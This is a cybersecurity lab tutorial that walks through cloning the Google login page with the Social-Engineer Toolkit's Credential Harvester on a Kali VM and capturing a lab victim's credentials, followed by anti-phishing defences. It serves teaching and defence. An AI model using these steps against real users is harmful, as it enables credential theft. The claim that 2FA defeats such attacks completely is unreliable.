Lab Overview
Lab at a Glance
192.168.30.46 (Kali VM IP)In this lab we use the Social-Engineer Toolkit (SET) — one of the most powerful and widely used penetration testing tools for social engineering — to perform a credential harvesting attack. We clone the Google login page, serve it from our Kali Linux VM, and capture any username and password submitted through the fake page.
This is one of the most realistic demonstrations of how phishing attacks work in the real world. The victim sees what appears to be a legitimate Google login page — the only visible difference is the IP address in the browser's address bar instead of google.com.
This lab must only be performed in an isolated, controlled lab environment on machines and accounts you own or have explicit written permission to test. Using SET against real users or live websites without authorisation is a criminal offence. All experiments here use a controlled victim device on a private lab network.
What is the Social-Engineer Toolkit (SET)?
The Social-Engineer Toolkit (SET) was created by David Kennedy (ReL1K) and is maintained by TrustedSec. It is an open-source Python-driven framework specifically designed for social engineering attacks. It automates complex attack scenarios that previously required deep technical knowledge — making it one of the most democratised and dangerous tools in a penetration tester's kit.
SET is pre-installed in Kali Linux and is listed under the Social Engineering category of tools. It covers attacks from spear-phishing and website cloning to wireless access point spoofing and PowerShell payloads.
| SET Attack Module | What It Does | Real-World Use |
|---|---|---|
| Spear-Phishing Attack Vectors | Sends targeted malicious emails with payloads | APT initial access campaigns |
| Website Attack Vectors | Clones websites and harvests credentials or delivers exploits | Credential theft, phishing portals |
| Infectious Media Generator | Creates malicious USB/CD autorun payloads | Physical access attacks |
| Create a Payload and Listener | Generates reverse shells and Meterpreter payloads | Remote access establishment |
| Wireless Access Point Attack | Creates a rogue AP to intercept traffic | Man-in-the-middle attacks |
| Powershell Attack Vectors | Executes PowerShell-based payloads in memory | Fileless malware attacks |
SET's power comes from automation. Cloning a website, setting up a listener, and capturing credentials would normally require hours of manual web development and server configuration. SET reduces this to a few menu selections and an IP address — which is exactly why defenders need to understand it deeply. You cannot defend against what you do not understand.
Step 1 — Launching the Social-Engineer Toolkit
Open a root terminal in Kali Linux and launch SET by typing setoolkit. SET requires root privileges to bind to port 80 and serve the cloned website.
setoolkit
Type 2 and press Enter to enter the Website Attack Vectors module.
SET must be run as root because the credential harvester needs to bind to port 80 — a privileged port below 1024 that only root can open on Linux. If you see a permission error, ensure you are in a root terminal (the prompt shows root@kali) not a regular user terminal.
Step 2 — Website Attack Vectors Module
After selecting option 2 from the main menu, SET displays the full Website Attack Vectors sub-menu with 10 different web-based attack methods.
Type 3 and press Enter to enter the Credential Harvester Attack Method.
SET explains that the Web Attack module utilises multiple web-based attacks to compromise the intended victim. The Credential Harvester specifically uses website cloning combined with a POST request interceptor — every form submission on the cloned page is silently forwarded to our Kali machine before being redirected to the real website.
Step 3 — Credential Harvester Attack Method
Inside the Credential Harvester module, SET offers three methods for delivering the fake page to victims. We use Site Cloner which automatically downloads and replicates a real website.
HARVESTER_REDIRECT and HARVESTER_URL settings in /etc/setoolkit/set.config for proper post-credential redirection.When a victim visits the cloned page and submits their login credentials, their browser sends an HTTP POST request — just like with the real website. SET intercepts this POST, extracts all the form fields (including the password), logs them to a local file, and then forwards the victim on to the real website. The victim typically notices nothing unusual — they see the real Google page load normally, assuming they simply need to try logging in again.
Step 4 — Enter IP Address and Clone Google
SET asks for two pieces of information before starting the harvester server: the IP address that victims will connect to (our Kali machine's IP), and the URL of the website to clone.
192.168.30.46). This is the address that will appear in the victim's browser address bar instead of google.com. SET also displays the important configuration notice about redirect settings.| Prompt | What to Enter | Notes |
|---|---|---|
| IP address for POST back | 192.168.30.46 | Your Kali machine's LAN IP — run ip addr to confirm yours |
| URL to clone | http://www.google.com | SET will download and replicate this page in seconds |
| Template selection | 2 (Google) | SET offers Google as built-in template option 2 |
After entering the IP address, SET begins cloning the target website. For the Google login page, we select template 2. SET downloads the page, rewrites all form action attributes to POST back to our Kali machine, and launches a lightweight web server on port 80.
/ and /favicon.ico from multiple IP addresses in the 192.168.30.x subnet.The credential harvester is now running. Any device on the same network that navigates to http://192.168.30.46 will see what appears to be the Google login page. All form submissions are being captured by SET in real time.
Step 5 — Viewing the Fake Page and Capturing Credentials
The Victim's Perspective — The Fake Google Login Page
On any device connected to the same network, open a browser and navigate to http://192.168.30.46. The victim sees a pixel-perfect replica of the Google login page — complete with the Google logo, Sign in button, and "Create an account" link.
192.168.30.46 instead of accounts.google.com. The browser also shows "Not secure" because SET serves over HTTP, not HTTPS. In a real attack, a domain name and SSL certificate would make this near-impossible to detect without inspecting the URL carefully.The Attacker's Perspective — Credentials Arrive in Real Time
When the victim enters their email and password and clicks Sign in, the credentials are immediately captured by SET and displayed in the terminal. Press Ctrl+C when finished to generate a full report.
SET has captured the victim's Google account email and password in plain text. In this controlled lab, these are test credentials used specifically for demonstration. In a real attack, these would give the attacker full access to the victim's Google account — email, drive, photos, linked services, and any other accounts using the same password.
Notice SET captures all POST parameters — not just the password. This includes session tokens (GALX, dsh), browser fingerprinting data (bgresponse=js_disabled), and anti-CSRF tokens. In advanced attacks, these tokens can sometimes be used to replay authenticated sessions even after the victim changes their password.
Defensive Measures — How to Protect Against Phishing
Now that we understand how credential harvesting works, here are the most effective defences — both for individual users and organisations:
🔍 Always Check the URL — Not Just the Page Appearance
The only reliable indicator of a fake page is the URL in the address bar. Train users to always verify the domain before entering any credentials. 192.168.30.46 is not Google. Neither is googl3.com or accounts.google.com.login-secure.net. The real Google login is always at accounts.google.com with a padlock (HTTPS).
🔐 Enable Two-Factor Authentication (2FA) on All Accounts
Even if an attacker captures your password, 2FA stops them from logging in. They would also need your physical phone or authenticator app. This single measure defeats credential harvesting attacks completely — the stolen password is useless without the second factor.
🔑 Use a Password Manager
Password managers fill in credentials only on the exact legitimate domain — they will not auto-fill on a phishing page because the domain does not match. This provides automatic protection even for users who are not diligently checking URLs.
📧 Never Click Links in Emails — Type URLs Directly
Phishing attacks depend on victims clicking attacker-controlled links. Teach users to navigate to sensitive sites by typing the URL directly into the browser, or using a saved bookmark — never by following a link from an email, SMS, or social media message.
🛡 Deploy Anti-Phishing DNS and Email Filtering
At the organisational level, deploy DNS filtering (e.g., Cisco Umbrella, Cloudflare Gateway) to block access to known phishing domains. Configure email filters to quarantine messages with suspicious links and flag external emails with warning banners. Implement DMARC, DKIM, and SPF to prevent domain spoofing in phishing emails.
📚 Regular Security Awareness Training
Run simulated phishing exercises using tools like GoPhish to measure and improve user awareness. Statistics show organisations that run regular phishing simulations reduce successful phishing click rates by over 70% within 12 months. Awareness is the most cost-effective defence available.
Conclusion & Learning Outcomes
In this lab we successfully launched the Social-Engineer Toolkit, navigated to the Website Attack Vectors module, selected the Credential Harvester with Site Cloner, cloned the Google login page, served it from our Kali machine, and captured real credentials entered by a victim on our lab network — all in under 30 minutes.
This demonstrates one of the most important principles in cybersecurity: technical security controls are bypassed completely when the human is the target. No firewall, antivirus, or IDS/IPS can stop a user from willingly entering their password into a convincing fake page. This is why phishing remains the number one initial access vector in virtually every major cyberattack.
Attack Flow Summary
After this lab, you can:
- Explain what the Social-Engineer Toolkit (SET) is and what attack categories it covers
- Launch SET and navigate its menu structure to the Website Attack Vectors module
- Configure and run the Credential Harvester with Site Cloner against a target URL
- Explain what the fake Google login page looks like from the victim's perspective
- Interpret the SET terminal output when credentials are captured
- Explain why 2FA completely defeats credential harvesting attacks
- Implement at least 4 defences against phishing in an organisational context
- Map this attack to the correct MITRE ATT&CK tactics and techniques
MITRE ATT&CK Mapping
In the next lab we explore Metasploit Framework — using it to scan for vulnerabilities, select exploit modules, gain a reverse shell on a target machine, and explore Meterpreter post-exploitation capabilities including privilege escalation and credential dumping.
Acknowledgements
Dr. Pritam Gajkumar Shah is an Australian-based computer science academic and cybersecurity specialist with extensive experience in teaching, research, and curriculum development in information technology and cyber security. He holds a Ph.D. in Information Sciences and Engineering from the University of Canberra, where his research focused on elliptic curve cryptography for resource-constrained wireless sensor networks. He is the founder of CyberPritam, a global cybersecurity learning platform that has provided free practical training to thousands of international students, and AusJournal, an academic publishing initiative supporting research dissemination and technical education. His work focuses on practical, lab-oriented cybersecurity education using tools such as Kali Linux, Metasploit, SET, Wireshark, and cloud security environments.